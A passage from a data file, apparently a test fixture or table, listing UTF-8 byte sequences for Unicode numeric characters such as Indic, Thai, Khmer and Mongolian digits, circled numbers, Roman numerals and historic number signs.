[ 217, 168 ],
[ 217, 169 ],
[ 219, 176 ],
[ 219, 177 ],
[ 219, 178 ],
[ 219, 179 ],
[ 219, 180 ],
[ 219, 181 ],
[ 219, 182 ],
[ 219, 183 ],
[ 219, 184 ],
[ 219, 185 ],
[ 223, 128 ],
[ 223, 129 ],
[ 223, 130 ],
[ 223, 131 ],
[ 223, 132 ],
[ 223, 133 ],
[ 223, 134 ],
[ 223, 135 ],
[ 223, 136 ],
[ 223, 137 ],
[ 224, 165, 166 ],
[ 224, 165, 167 ],
[ 224, 165, 168 ],
[ 224, 165, 169 ],
[ 224, 165, 170 ],
[ 224, 165, 171 ],
[ 224, 165, 172 ],
[ 224, 165, 173 ],
[ 224, 165, 174 ],
[ 224, 165, 175 ],
[ 224, 167, 166 ],
[ 224, 167, 167 ],
[ 224, 167, 168 ],
[ 224, 167, 169 ],
[ 224, 167, 170 ],
[ 224, 167, 171 ],
[ 224, 167, 172 ],
[ 224, 167, 173 ],
[ 224, 167, 174 ],
[ 224, 167, 175 ],
[ 224, 167, 180 ],
[ 224, 167, 181 ],
[ 224, 167, 182 ],
[ 224, 167, 183 ],
[ 224, 167, 184 ],
[ 224, 167, 185 ],
[ 224, 169, 166 ],
[ 224, 169, 167 ],
[ 224, 169, 168 ],
[ 224, 169, 169 ],
[ 224, 169, 170 ],
[ 224, 169, 171 ],
[ 224, 169, 172 ],
[ 224, 169, 173 ],
[ 224, 169, 174 ],
[ 224, 169, 175 ],
[ 224, 171, 166 ],
[ 224, 171, 167 ],
[ 224, 171, 168 ],
[ 224, 171, 169 ],
[ 224, 171, 170 ],
[ 224, 171, 171 ],
[ 224, 171, 172 ],
[ 224, 171, 173 ],
[ 224, 171, 174 ],
[ 224, 171, 175 ],
[ 224, 173, 166 ],
[ 224, 173, 167 ],
[ 224, 173, 168 ],
[ 224, 173, 169 ],
[ 224, 173, 170 ],
[ 224, 173, 171 ],
[ 224, 173, 172 ],
[ 224, 173, 173 ],
[ 224, 173, 174 ],
[ 224, 173, 175 ],
[ 224, 173, 178 ],
[ 224, 173, 179 ],
[ 224, 173, 180 ],
[ 224, 173, 181 ],
[ 224, 173, 182 ],
[ 224, 173, 183 ],
[ 224, 175, 166 ],
[ 224, 175, 167 ],
[ 224, 175, 168 ],
[ 224, 175, 169 ],
[ 224, 175, 170 ],
[ 224, 175, 171 ],
[ 224, 175, 172 ],
[ 224, 175, 173 ],
[ 224, 175, 174 ],
[ 224, 175, 175 ],
[ 224, 175, 176 ],
[ 224, 175, 177 ],
[ 224, 175, 178 ],
[ 224, 177, 166 ],
[ 224, 177, 167 ],
[ 224, 177, 168 ],
[ 224, 177, 169 ],
[ 224, 177, 170 ],
[ 224, 177, 171 ],
[ 224, 177, 172 ],
[ 224, 177, 173 ],
[ 224, 177, 174 ],
[ 224, 177, 175 ],
[ 224, 177, 184 ],
[ 224, 177, 185 ],
[ 224, 177, 186 ],
[ 224, 177, 187 ],
[ 224, 177, 188 ],
[ 224, 177, 189 ],
[ 224, 177, 190 ],
[ 224, 179, 166 ],
[ 224, 179, 167 ],
[ 224, 179, 168 ],
[ 224, 179, 169 ],
[ 224, 179, 170 ],
[ 224, 179, 171 ],
[ 224, 179, 172 ],
[ 224, 179, 173 ],
[ 224, 179, 174 ],
[ 224, 179, 175 ],
[ 224, 181, 166 ],
[ 224, 181, 167 ],
[ 224, 181, 168 ],
[ 224, 181, 169 ],
[ 224, 181, 170 ],
[ 224, 181, 171 ],
[ 224, 181, 172 ],
[ 224, 181, 173 ],
[ 224, 181, 174 ],
[ 224, 181, 175 ],
[ 224, 181, 176 ],
[ 224, 181, 177 ],
[ 224, 181, 178 ],
[ 224, 181, 179 ],
[ 224, 181, 180 ],
[ 224, 181, 181 ],
[ 224, 183, 166 ],
[ 224, 183, 167 ],
[ 224, 183, 168 ],
[ 224, 183, 169 ],
[ 224, 183, 170 ],
[ 224, 183, 171 ],
[ 224, 183, 172 ],
[ 224, 183, 173 ],
[ 224, 183, 174 ],
[ 224, 183, 175 ],
[ 224, 185, 144 ],
[ 224, 185, 145 ],
[ 224, 185, 146 ],
[ 224, 185, 147 ],
[ 224, 185, 148 ],
[ 224, 185, 149 ],
[ 224, 185, 150 ],
[ 224, 185, 151 ],
[ 224, 185, 152 ],
[ 224, 185, 153 ],
[ 224, 187, 144 ],
[ 224, 187, 145 ],
[ 224, 187, 146 ],
[ 224, 187, 147 ],
[ 224, 187, 148 ],
[ 224, 187, 149 ],
[ 224, 187, 150 ],
[ 224, 187, 151 ],
[ 224, 187, 152 ],
[ 224, 187, 153 ],
[ 224, 188, 160 ],
[ 224, 188, 161 ],
[ 224, 188, 162 ],
[ 224, 188, 163 ],
[ 224, 188, 164 ],
[ 224, 188, 165 ],
[ 224, 188, 166 ],
[ 224, 188, 167 ],
[ 224, 188, 168 ],
[ 224, 188, 169 ],
[ 224, 188, 170 ],
[ 224, 188, 171 ],
[ 224, 188, 172 ],
[ 224, 188, 173 ],
[ 224, 188, 174 ],
[ 224, 188, 175 ],
[ 224, 188, 176 ],
[ 224, 188, 177 ],
[ 224, 188, 178 ],
[ 224, 188, 179 ],
[ 225, 129, 128 ],
[ 225, 129, 129 ],
[ 225, 129, 130 ],
[ 225, 129, 131 ],
[ 225, 129, 132 ],
[ 225, 129, 133 ],
[ 225, 129, 134 ],
[ 225, 129, 135 ],
[ 225, 129, 136 ],
[ 225, 129, 137 ],
[ 225, 130, 144 ],
[ 225, 130, 145 ],
[ 225, 130, 146 ],
[ 225, 130, 147 ],
[ 225, 130, 148 ],
[ 225, 130, 149 ],
[ 225, 130, 150 ],
[ 225, 130, 151 ],
[ 225, 130, 152 ],
[ 225, 130, 153 ],
[ 225, 141, 169 ],
[ 225, 141, 170 ],
[ 225, 141, 171 ],
[ 225, 141, 172 ],
[ 225, 141, 173 ],
[ 225, 141, 174 ],
[ 225, 141, 175 ],
[ 225, 141, 176 ],
[ 225, 141, 177 ],
[ 225, 141, 178 ],
[ 225, 141, 179 ],
[ 225, 141, 180 ],
[ 225, 141, 181 ],
[ 225, 141, 182 ],
[ 225, 141, 183 ],
[ 225, 141, 184 ],
[ 225, 141, 185 ],
[ 225, 141, 186 ],
[ 225, 141, 187 ],
[ 225, 141, 188 ],
[ 225, 155, 174 ],
[ 225, 155, 175 ],
[ 225, 155, 176 ],
[ 225, 159, 160 ],
[ 225, 159, 161 ],
[ 225, 159, 162 ],
[ 225, 159, 163 ],
[ 225, 159, 164 ],
[ 225, 159, 165 ],
[ 225, 159, 166 ],
[ 225, 159, 167 ],
[ 225, 159, 168 ],
[ 225, 159, 169 ],
[ 225, 159, 176 ],
[ 225, 159, 177 ],
[ 225, 159, 178 ],
[ 225, 159, 179 ],
[ 225, 159, 180 ],
[ 225, 159, 181 ],
[ 225, 159, 182 ],
[ 225, 159, 183 ],
[ 225, 159, 184 ],
[ 225, 159, 185 ],
[ 225, 160, 144 ],
[ 225, 160, 145 ],
[ 225, 160, 146 ],
[ 225, 160, 147 ],
[ 225, 160, 148 ],
[ 225, 160, 149 ],
[ 225, 160, 150 ],
[ 225, 160, 151 ],
[ 225, 160, 152 ],
[ 225, 160, 153 ],
[ 225, 165, 134 ],
[ 225, 165, 135 ],
[ 225, 165, 136 ],
[ 225, 165, 137 ],
[ 225, 165, 138 ],
[ 225, 165, 139 ],
[ 225, 165, 140 ],
[ 225, 165, 141 ],
[ 225, 165, 142 ],
[ 225, 165, 143 ],
[ 225, 167, 144 ],
[ 225, 167, 145 ],
[ 225, 167, 146 ],
[ 225, 167, 147 ],
[ 225, 167, 148 ],
[ 225, 167, 149 ],
[ 225, 167, 150 ],
[ 225, 167, 151 ],
[ 225, 167, 152 ],
[ 225, 167, 153 ],
[ 225, 167, 154 ],
[ 225, 170, 128 ],
[ 225, 170, 129 ],
[ 225, 170, 130 ],
[ 225, 170, 131 ],
[ 225, 170, 132 ],
[ 225, 170, 133 ],
[ 225, 170, 134 ],
[ 225, 170, 135 ],
[ 225, 170, 136 ],
[ 225, 170, 137 ],
[ 225, 170, 144 ],
[ 225, 170, 145 ],
[ 225, 170, 146 ],
[ 225, 170, 147 ],
[ 225, 170, 148 ],
[ 225, 170, 149 ],
[ 225, 170, 150 ],
[ 225, 170, 151 ],
[ 225, 170, 152 ],
[ 225, 170, 153 ],
[ 225, 173, 144 ],
[ 225, 173, 145 ],
[ 225, 173, 146 ],
[ 225, 173, 147 ],
[ 225, 173, 148 ],
[ 225, 173, 149 ],
[ 225, 173, 150 ],
[ 225, 173, 151 ],
[ 225, 173, 152 ],
[ 225, 173, 153 ],
[ 225, 174, 176 ],
[ 225, 174, 177 ],
[ 225, 174, 178 ],
[ 225, 174, 179 ],
[ 225, 174, 180 ],
[ 225, 174, 181 ],
[ 225, 174, 182 ],
[ 225, 174, 183 ],
[ 225, 174, 184 ],
[ 225, 174, 185 ],
[ 225, 177, 128 ],
[ 225, 177, 129 ],
[ 225, 177, 130 ],
[ 225, 177, 131 ],
[ 225, 177, 132 ],
[ 225, 177, 133 ],
[ 225, 177, 134 ],
[ 225, 177, 135 ],
[ 225, 177, 136 ],
[ 225, 177, 137 ],
[ 225, 177, 144 ],
[ 225, 177, 145 ],
[ 225, 177, 146 ],
[ 225, 177, 147 ],
[ 225, 177, 148 ],
[ 225, 177, 149 ],
[ 225, 177, 150 ],
[ 225, 177, 151 ],
[ 225, 177, 152 ],
[ 225, 177, 153 ],
[ 226, 129, 176 ],
[ 226, 129, 180 ],
[ 226, 129, 181 ],
[ 226, 129, 182 ],
[ 226, 129, 183 ],
[ 226, 129, 184 ],
[ 226, 129, 185 ],
[ 226, 130, 128 ],
[ 226, 130, 129 ],
[ 226, 130, 130 ],
[ 226, 130, 131 ],
[ 226, 130, 132 ],
[ 226, 130, 133 ],
[ 226, 130, 134 ],
[ 226, 130, 135 ],
[ 226, 130, 136 ],
[ 226, 130, 137 ],
[ 226, 133, 144 ],
[ 226, 133, 145 ],
[ 226, 133, 146 ],
[ 226, 133, 147 ],
[ 226, 133, 148 ],
[ 226, 133, 149 ],
[ 226, 133, 150 ],
[ 226, 133, 151 ],
[ 226, 133, 152 ],
[ 226, 133, 153 ],
[ 226, 133, 154 ],
[ 226, 133, 155 ],
[ 226, 133, 156 ],
[ 226, 133, 157 ],
[ 226, 133, 158 ],
[ 226, 133, 159 ],
[ 226, 133, 160 ],
[ 226, 133, 161 ],
[ 226, 133, 162 ],
[ 226, 133, 163 ],
[ 226, 133, 164 ],
[ 226, 133, 165 ],
[ 226, 133, 166 ],
[ 226, 133, 167 ],
[ 226, 133, 168 ],
[ 226, 133, 169 ],
[ 226, 133, 170 ],
[ 226, 133, 171 ],
[ 226, 133, 172 ],
[ 226, 133, 173 ],
[ 226, 133, 174 ],
[ 226, 133, 175 ],
[ 226, 133, 176 ],
[ 226, 133, 177 ],
[ 226, 133, 178 ],
[ 226, 133, 179 ],
[ 226, 133, 180 ],
[ 226, 133, 181 ],
[ 226, 133, 182 ],
[ 226, 133, 183 ],
[ 226, 133, 184 ],
[ 226, 133, 185 ],
[ 226, 133, 186 ],
[ 226, 133, 187 ],
[ 226, 133, 188 ],
[ 226, 133, 189 ],
[ 226, 133, 190 ],
[ 226, 133, 191 ],
[ 226, 134, 128 ],
[ 226, 134, 129 ],
[ 226, 134, 130 ],
[ 226, 134, 133 ],
[ 226, 134, 134 ],
[ 226, 134, 135 ],
[ 226, 134, 136 ],
[ 226, 134, 137 ],
[ 226, 145, 160 ],
[ 226, 145, 161 ],
[ 226, 145, 162 ],
[ 226, 145, 163 ],
[ 226, 145, 164 ],
[ 226, 145, 165 ],
[ 226, 145, 166 ],
[ 226, 145, 167 ],
[ 226, 145, 168 ],
[ 226, 145, 169 ],
[ 226, 145, 170 ],
[ 226, 145, 171 ],
[ 226, 145, 172 ],
[ 226, 145, 173 ],
[ 226, 145, 174 ],
[ 226, 145, 175 ],
[ 226, 145, 176 ],
[ 226, 145, 177 ],
[ 226, 145, 178 ],
[ 226, 145, 179 ],
[ 226, 145, 180 ],
[ 226, 145, 181 ],
[ 226, 145, 182 ],
[ 226, 145, 183 ],
[ 226, 145, 184 ],
[ 226, 145, 185 ],
[ 226, 145, 186 ],
[ 226, 145, 187 ],
[ 226, 145, 188 ],
[ 226, 145, 189 ],
[ 226, 145, 190 ],
[ 226, 145, 191 ],
[ 226, 146, 128 ],
[ 226, 146, 129 ],
[ 226, 146, 130 ],
[ 226, 146, 131 ],
[ 226, 146, 132 ],
[ 226, 146, 133 ],
[ 226, 146, 134 ],
[ 226, 146, 135 ],
[ 226, 146, 136 ],
[ 226, 146, 137 ],
[ 226, 146, 138 ],
[ 226, 146, 139 ],
[ 226, 146, 140 ],
[ 226, 146, 141 ],
[ 226, 146, 142 ],
[ 226, 146, 143 ],
[ 226, 146, 144 ],
[ 226, 146, 145 ],
[ 226, 146, 146 ],
[ 226, 146, 147 ],
[ 226, 146, 148 ],
[ 226, 146, 149 ],
[ 226, 146, 150 ],
[ 226, 146, 151 ],
[ 226, 146, 152 ],
[ 226, 146, 153 ],
[ 226, 146, 154 ],
[ 226, 146, 155 ],
[ 226, 147, 170 ],
[ 226, 147, 171 ],
[ 226, 147, 172 ],
[ 226, 147, 173 ],
[ 226, 147, 174 ],
[ 226, 147, 175 ],
[ 226, 147, 176 ],
[ 226, 147, 177 ],
[ 226, 147, 178 ],
[ 226, 147, 179 ],
[ 226, 147, 180 ],
[ 226, 147, 181 ],
[ 226, 147, 182 ],
[ 226, 147, 183 ],
[ 226, 147, 184 ],
[ 226, 147, 185 ],
[ 226, 147, 186 ],
[ 226, 147, 187 ],
[ 226, 147, 188 ],
[ 226, 147, 189 ],
[ 226, 147, 190 ],
[ 226, 147, 191 ],
[ 226, 157, 182 ],
[ 226, 157, 183 ],
[ 226, 157, 184 ],
[ 226, 157, 185 ],
[ 226, 157, 186 ],
[ 226, 157, 187 ],
[ 226, 157, 188 ],
[ 226, 157, 189 ],
[ 226, 157, 190 ],
[ 226, 157, 191 ],
[ 226, 158, 128 ],
[ 226, 158, 129 ],
[ 226, 158, 130 ],
[ 226, 158, 131 ],
[ 226, 158, 132 ],
[ 226, 158, 133 ],
[ 226, 158, 134 ],
[ 226, 158, 135 ],
[ 226, 158, 136 ],
[ 226, 158, 137 ],
[ 226, 158, 138 ],
[ 226, 158, 139 ],
[ 226, 158, 140 ],
[ 226, 158, 141 ],
[ 226, 158, 142 ],
[ 226, 158, 143 ],
[ 226, 158, 144 ],
[ 226, 158, 145 ],
[ 226, 158, 146 ],
[ 226, 158, 147 ],
[ 226, 179, 189 ],
[ 227, 128, 135 ],
[ 227, 128, 161 ],
[ 227, 128, 162 ],
[ 227, 128, 163 ],
[ 227, 128, 164 ],
[ 227, 128, 165 ],
[ 227, 128, 166 ],
[ 227, 128, 167 ],
[ 227, 128, 168 ],
[ 227, 128, 169 ],
[ 227, 128, 184 ],
[ 227, 128, 185 ],
[ 227, 128, 186 ],
[ 227, 134, 146 ],
[ 227, 134, 147 ],
[ 227, 134, 148 ],
[ 227, 134, 149 ],
[ 227, 136, 160 ],
[ 227, 136, 161 ],
[ 227, 136, 162 ],
[ 227, 136, 163 ],
[ 227, 136, 164 ],
[ 227, 136, 165 ],
[ 227, 136, 166 ],
[ 227, 136, 167 ],
[ 227, 136, 168 ],
[ 227, 136, 169 ],
[ 227, 137, 136 ],
[ 227, 137, 137 ],
[ 227, 137, 138 ],
[ 227, 137, 139 ],
[ 227, 137, 140 ],
[ 227, 137, 141 ],
[ 227, 137, 142 ],
[ 227, 137, 143 ],
[ 227, 137, 145 ],
[ 227, 137, 146 ],
[ 227, 137, 147 ],
[ 227, 137, 148 ],
[ 227, 137, 149 ],
[ 227, 137, 150 ],
[ 227, 137, 151 ],
[ 227, 137, 152 ],
[ 227, 137, 153 ],
[ 227, 137, 154 ],
[ 227, 137, 155 ],
[ 227, 137, 156 ],
[ 227, 137, 157 ],
[ 227, 137, 158 ],
[ 227, 137, 159 ],
[ 227, 138, 128 ],
[ 227, 138, 129 ],
[ 227, 138, 130 ],
[ 227, 138, 131 ],
[ 227, 138, 132 ],
[ 227, 138, 133 ],
[ 227, 138, 134 ],
[ 227, 138, 135 ],
[ 227, 138, 136 ],
[ 227, 138, 137 ],
[ 227, 138, 177 ],
[ 227, 138, 178 ],
[ 227, 138, 179 ],
[ 227, 138, 180 ],
[ 227, 138, 181 ],
[ 227, 138, 182 ],
[ 227, 138, 183 ],
[ 227, 138, 184 ],
[ 227, 138, 185 ],
[ 227, 138, 186 ],
[ 227, 138, 187 ],
[ 227, 138, 188 ],
[ 227, 138, 189 ],
[ 227, 138, 190 ],
[ 227, 138, 191 ],
[ 234, 152, 160 ],
[ 234, 152, 161 ],
[ 234, 152, 162 ],
[ 234, 152, 163 ],
[ 234, 152, 164 ],
[ 234, 152, 165 ],
[ 234, 152, 166 ],
[ 234, 152, 167 ],
[ 234, 152, 168 ],
[ 234, 152, 169 ],
[ 234, 155, 166 ],
[ 234, 155, 167 ],
[ 234, 155, 168 ],
[ 234, 155, 169 ],
[ 234, 155, 170 ],
[ 234, 155, 171 ],
[ 234, 155, 172 ],
[ 234, 155, 173 ],
[ 234, 155, 174 ],
[ 234, 155, 175 ],
[ 234, 160, 176 ],
[ 234, 160, 177 ],
[ 234, 160, 178 ],
[ 234, 160, 179 ],
[ 234, 160, 180 ],
[ 234, 160, 181 ],
[ 234, 163, 144 ],
[ 234, 163, 145 ],
[ 234, 163, 146 ],
[ 234, 163, 147 ],
[ 234, 163, 148 ],
[ 234, 163, 149 ],
[ 234, 163, 150 ],
[ 234, 163, 151 ],
[ 234, 163, 152 ],
[ 234, 163, 153 ],
[ 234, 164, 128 ],
[ 234, 164, 129 ],
[ 234, 164, 130 ],
[ 234, 164, 131 ],
[ 234, 164, 132 ],
[ 234, 164, 133 ],
[ 234, 164, 134 ],
[ 234, 164, 135 ],
[ 234, 164, 136 ],
[ 234, 164, 137 ],
[ 234, 167, 144 ],
[ 234, 167, 145 ],
[ 234, 167, 146 ],
[ 234, 167, 147 ],
[ 234, 167, 148 ],
[ 234, 167, 149 ],
[ 234, 167, 150 ],
[ 234, 167, 151 ],
[ 234, 167, 152 ],
[ 234, 167, 153 ],
[ 234, 167, 176 ],
[ 234, 167, 177 ],
[ 234, 167, 178 ],
[ 234, 167, 179 ],
[ 234, 167, 180 ],
[ 234, 167, 181 ],
[ 234, 167, 182 ],
[ 234, 167, 183 ],
[ 234, 167, 184 ],
[ 234, 167, 185 ],
[ 234, 169, 144 ],
[ 234, 169, 145 ],
[ 234, 169, 146 ],
[ 234, 169, 147 ],
[ 234, 169, 148 ],
[ 234, 169, 149 ],
[ 234, 169, 150 ],
[ 234, 169, 151 ],
[ 234, 169, 152 ],
[ 234, 169, 153 ],
[ 234, 175, 176 ],
[ 234, 175, 177 ],
[ 234, 175, 178 ],
[ 234, 175, 179 ],
[ 234, 175, 180 ],
[ 234, 175, 181 ],
[ 234, 175, 182 ],
[ 234, 175, 183 ],
[ 234, 175, 184 ],
[ 234, 175, 185 ],
[ 239, 188, 144 ],
[ 239, 188, 145 ],
[ 239, 188, 146 ],
[ 239, 188, 147 ],
[ 239, 188, 148 ],
[ 239, 188, 149 ],
[ 239, 188, 150 ],
[ 239, 188, 151 ],
[ 239, 188, 152 ],
[ 239, 188, 153 ],
[ 240, 144, 132, 135 ],
[ 240, 144, 132, 136 ],
[ 240, 144, 132, 137 ],
[ 240, 144, 132, 138 ],
[ 240, 144, 132, 139 ],
[ 240, 144, 132, 140 ],
[ 240, 144, 132, 141 ],
[ 240, 144, 132, 142 ],
[ 240, 144, 132, 143 ],
[ 240, 144, 132, 144 ],
[ 240, 144, 132, 145 ],
[ 240, 144, 132, 146 ],
[ 240, 144, 132, 147 ],
[ 240, 144, 132, 148 ],
[ 240, 144, 132, 149 ],
[ 240, 144, 132, 150 ],
[ 240, 144, 132, 151 ],
[ 240, 144, 132, 152 ],
[ 240, 144, 132, 153 ],
[ 240, 144, 132, 154 ],
[ 240, 144, 132, 155 ],
[ 240, 144, 132, 156 ],
[ 240, 144, 132, 157 ],
[ 240, 144, 132, 158 ],
[ 240, 144, 132, 159 ],
[ 240, 144, 132, 160 ],
[ 240, 144, 132, 161 ],
[ 240, 144, 132, 162 ],
[ 240, 144, 132, 163 ],
[ 240, 144, 132, 164 ],
[ 240, 144, 132, 165 ],
[ 240, 144, 132, 166 ],
[ 240, 144, 132, 167 ],
[ 240, 144, 132, 168 ],
[ 240, 144, 132, 169 ],
[ 240, 144, 132, 170 ],
[ 240, 144, 132, 171 ],
[ 240, 144, 132, 172 ],
[ 240, 144, 132, 173 ],
[ 240, 144, 132, 174 ],
[ 240, 144, 132, 175 ],
[ 240, 144, 132, 176 ],
[ 240, 144, 132, 177 ],
[ 240, 144, 132, 178 ],
[ 240, 144, 132, 179 ],
[ 240, 144, 133, 128 ],
[ 240, 144, 133, 129 ],
[ 240, 144, 133, 130 ],
[ 240, 144, 133, 131 ],
[ 240, 144, 133, 132 ],
[ 240, 144, 133, 133 ],
[ 240, 144, 133, 134 ],
[ 240, 144, 133, 135 ],
[ 240, 144, 133, 136 ],
[ 240, 144, 133, 137 ],
[ 240, 144, 133, 138 ],
[ 240, 144, 133, 139 ],
[ 240, 144, 133, 140 ],
[ 240, 144, 133, 141 ],
[ 240, 144, 133, 142 ],
[ 240, 144, 133, 143 ],
[ 240, 144, 133, 144 ],
[ 240, 144, 133, 145 ],
[ 240, 144, 133, 146 ],
[ 240, 144, 133, 147 ],
[ 240, 144, 133, 148 ],
[ 240, 144, 133, 149 ],
[ 240, 144, 133, 150 ],
[ 240, 144, 133, 151 ],
[ 240, 144, 133, 152 ],
[ 240, 144, 133, 153 ],
[ 240, 144, 133, 154 ],
[ 240, 144, 133, 155 ],
[ 240, 144, 133, 156 ],
[ 240, 144, 133, 157 ],
[ 240, 144, 133, 158 ],
[ 240, 144, 133, 159 ],
[ 240, 144, 133, 160 ],
[ 240, 144, 133, 161 ],
[ 240, 144, 133, 162 ],
[ 240, 144, 133, 163 ],
[ 240, 144, 133, 164 ],
[ 240, 144, 133, 165 ],
[ 240, 144, 133, 166 ],
[ 240, 144, 133, 167 ],
[ 240, 144, 133, 168 ],
[ 240, 144, 133, 169 ],
[ 240, 144, 133, 170 ],
[ 240, 144, 133, 171 ],
[ 240, 144, 133, 172 ],
[ 240, 144, 133, 173 ],
[ 240, 144, 133, 174 ],
[ 240, 144, 133, 175 ],
[ 240, 144, 133, 176 ],
[ 240, 144, 133, 177 ],
[ 240, 144, 133, 178 ],
[ 240, 144, 133, 179 ],
[ 240, 144, 133, 180 ],
[ 240, 144, 133, 181 ],
[ 240, 144, 133, 182 ],
[ 240, 144, 133, 183 ],
[ 240, 144, 133, 184 ],
[ 240, 144, 134, 138 ],
[ 240, 144, 134, 139 ],
[ 240, 144, 139, 161 ],
[ 240, 144, 139, 162 ],
[ 240, 144, 139, 163 ],
[ 240, 144, 139, 164 ],
[ 240, 144, 139, 165 ],
[ 240, 144, 139, 166 ],
[ 240, 144, 139, 167 ],
[ 240, 144, 139, 168 ],
[ 240, 144, 139, 169 ],
[ 240, 144, 139, 170 ],
[ 240, 144, 139, 171 ],
[ 240, 144, 139, 172 ],
[ 240, 144, 139, 173 ],
[ 240, 144, 139, 174 ],
[ 240, 144, 139, 175 ],
[ 240, 144, 139, 176 ],
[ 240, 144, 139, 177 ],
[ 240, 144, 139, 178 ],
[ 240, 144, 139, 179 ],
[ 240, 144, 139, 180 ],
[ 240, 144, 139, 181 ],
[ 240, 144, 139, 182 ],
[ 240, 144, 139, 183 ],
[ 240, 144, 139, 184 ],
[ 240, 144, 139, 185 ],
[ 240, 144, 139, 186 ],
[ 240, 144, 139, 187 ],
[ 240, 144, 140, 160 ],
[ 240, 144, 140, 161 ],
[ 240, 144, 140, 162 ],
[ 240, 144, 140, 163 ],
[ 240, 144, 141, 129 ],
[ 240, 144, 141, 138 ],
[ 240, 144, 143, 145 ],
[ 240, 144, 143, 146 ],
[ 240, 144, 143, 147 ],
[ 240, 144, 143, 148 ],
[ 240, 144, 143, 149 ],
[ 240, 144, 146, 160 ],
[ 240, 144, 146, 161 ],
[ 240, 144, 146, 162 ],
[ 240, 144, 146, 163 ],
[ 240, 144, 146, 164 ],
[ 240, 144, 146, 165 ],
[ 240, 144, 146, 166 ],
[ 240, 144, 146, 167 ],
[ 240, 144, 146, 168 ],
[ 240, 144, 146, 169 ],
[ 240, 144, 161, 152 ],
[ 240, 144, 161, 153 ],
[ 240, 144, 161, 154 ],
[ 240, 144, 161, 155 ],
[ 240, 144, 161, 156 ],
[ 240, 144, 161, 157 ],
[ 240, 144, 161, 158 ],
[ 240, 144, 161, 159 ],
[ 240, 144, 161, 185 ],
[ 240, 144, 161, 186 ],
[ 240, 144, 161, 187 ],
[ 240, 144, 161, 188 ],
[ 240, 144, 161, 189 ],
[ 240, 144, 161, 190 ],
[ 240, 144, 161, 191 ],
[ 240, 144, 162, 167 ],
[ 240, 144, 162, 168 ],
[ 240, 144, 162, 169 ],
[ 240, 144, 162, 170 ],
[ 240, 144, 162, 171 ],
[ 240, 144, 162, 172 ],
[ 240, 144, 162, 173 ],
[ 240, 144, 162, 174 ],
[ 240, 144, 162, 175 ],
[ 240, 144, 163, 187 ],
[ 240, 144, 163, 188 ],
[ 240, 144, 163, 189 ],
[ 240, 144, 163, 190 ],
[ 240, 144, 163, 191 ],
[ 240, 144, 164, 150 ],
[ 240, 144, 164, 151 ],
[ 240, 144, 164, 152 ],
[ 240, 144, 164, 153 ],
[ 240, 144, 164, 154 ],
[ 240, 144, 164, 155 ],
[ 240, 144, 166, 188 ],
[ 240, 144, 166, 189 ],
[ 240, 144, 167, 128 ],
[ 240, 144, 167, 129 ],
[ 240, 144, 167, 130 ],
[ 240, 144, 167, 131 ],
[ 240, 144, 167, 132 ],
[ 240, 144, 167, 133 ],
[ 240, 144, 167, 134 ],
[ 240, 144, 167, 135 ],
[ 240, 144, 167, 136 ],
[ 240, 144, 167, 137 ],
[ 240, 144, 167, 138 ],
[ 240, 144, 167, 139 ],
[ 240, 144, 167, 140 ],
[ 240, 144, 167, 141 ],
[ 240, 144, 167, 142 ],
[ 240, 144, 167, 143 ],
[ 240, 144, 167, 146 ],
[ 240, 144, 167, 147 ],
[ 240, 144, 167, 148 ],
[ 240, 144, 167, 149 ],
[ 240, 144, 167, 150 ],
[ 240, 144, 167, 151 ],
[ 240, 144, 167, 152 ],
[ 240, 144, 167, 153 ],
[ 240, 144, 167, 154 ],
[ 240, 144, 167, 155 ],
[ 240, 144, 167, 156 ],
[ 240, 144, 167, 157 ],
[ 240, 144, 167, 158 ],
[ 240, 144, 167, 159 ],
[ 240, 144, 167, 160 ],
[ 240, 144, 167, 161 ],
[ 240, 144, 167, 162 ],
[ 240, 144, 167, 163 ],
[ 240, 144, 167, 164 ],
[ 240, 144, 167, 165 ],
[ 240, 144, 167, 166 ],
[ 240, 144, 167, 167 ],
[ 240, 144, 167, 168 ],
[ 240, 144, 167, 169 ],
[ 240, 144, 167, 170 ],
[ 240, 144, 167, 171 ],
[ 240, 144, 167, 172 ],
[ 240, 144, 167, 173 ],
[ 240, 144, 167, 174 ],
[ 240, 144, 167, 175 ],
[ 240, 144, 167, 176 ],
[ 240, 144, 167, 177 ],
[ 240, 144, 167, 178 ],
[ 240, 144, 167, 179 ],
[ 240, 144, 167, 180 ],
[ 240, 144, 167, 181 ],
[ 240, 144, 167, 182 ],
[ 240, 144, 167, 183 ],
[ 240, 144, 167, 184 ],
[ 240, 144, 167, 185 ],
[ 240, 144, 167, 186 ],
[ 240, 144, 167, 187 ],
[ 240, 144, 167, 188 ],
[ 240, 144, 167, 189 ],
[ 240, 144, 167, 190 ],
[ 240, 144, 167, 191 ],
[ 240, 144, 169, 128 ],
[ 240, 144, 169, 129 ],
[ 240, 144, 169, 130 ],
[ 240, 144, 169, 131 ],
[ 240, 144, 169, 132 ],
[ 240, 144, 169, 133 ],
[ 240, 144, 169, 134 ],
[ 240, 144, 169, 135 ],
[ 240, 144, 169, 189 ],
[ 240, 144, 169, 190 ],
[ 240, 144, 170, 157 ],
[ 240, 144, 170, 158 ],
[ 240, 144, 170, 159 ],
[ 240, 144, 171, 171 ],
[ 240, 144, 171, 172 ],
[ 240, 144, 171, 173 ],
[ 240, 144, 171, 174 ],
[ 240, 144, 171, 175 ],
[ 240, 144, 173, 152 ],
[ 240, 144, 173, 153 ],
[ 240, 144, 173, 154 ],
[ 240, 144, 173, 155 ],
[ 240, 144, 173, 156 ],
[ 240, 144, 173, 157 ],
[ 240, 144, 173, 158 ],
[ 240, 144, 173, 159 ],
[ 240, 144, 173, 184 ],
[ 240, 144, 173, 185 ],
[ 240, 144, 173, 186 ],
[ 240, 144, 173, 187 ],
[ 240, 144, 173, 188 ],
[ 240, 144, 173, 189 ],
[ 240, 144, 173, 190 ],
[ 240, 144, 173, 191 ],
[ 240, 144, 174, 169 ],
[ 240, 144, 174, 170 ],
[ 240, 144, 174, 171 ],
[ 240, 144, 174, 172 ],
[ 240, 144, 174, 173 ],
[ 240, 144, 174, 174 ],
[ 240, 144, 174, 175 ],
[ 240, 144, 179, 186 ],
[ 240, 144, 179, 187 ],
[ 240, 144, 179, 188 ],
[ 240, 144, 179, 189 ],
[ 240, 144, 179, 190 ],
[ 240, 144, 179, 191 ],
[ 240, 144, 185, 160 ],
[ 240, 144, 185, 161 ],
[ 240, 144, 185, 162 ],
[ 240, 144, 185, 163 ],
[ 240, 144, 185, 164 ],
[ 240, 144, 185, 165 ],
[ 240, 144, 185, 166 ],
[ 240, 144, 185, 167 ],
[ 240, 144, 185, 168 ],
[ 240, 144, 185, 169 ],
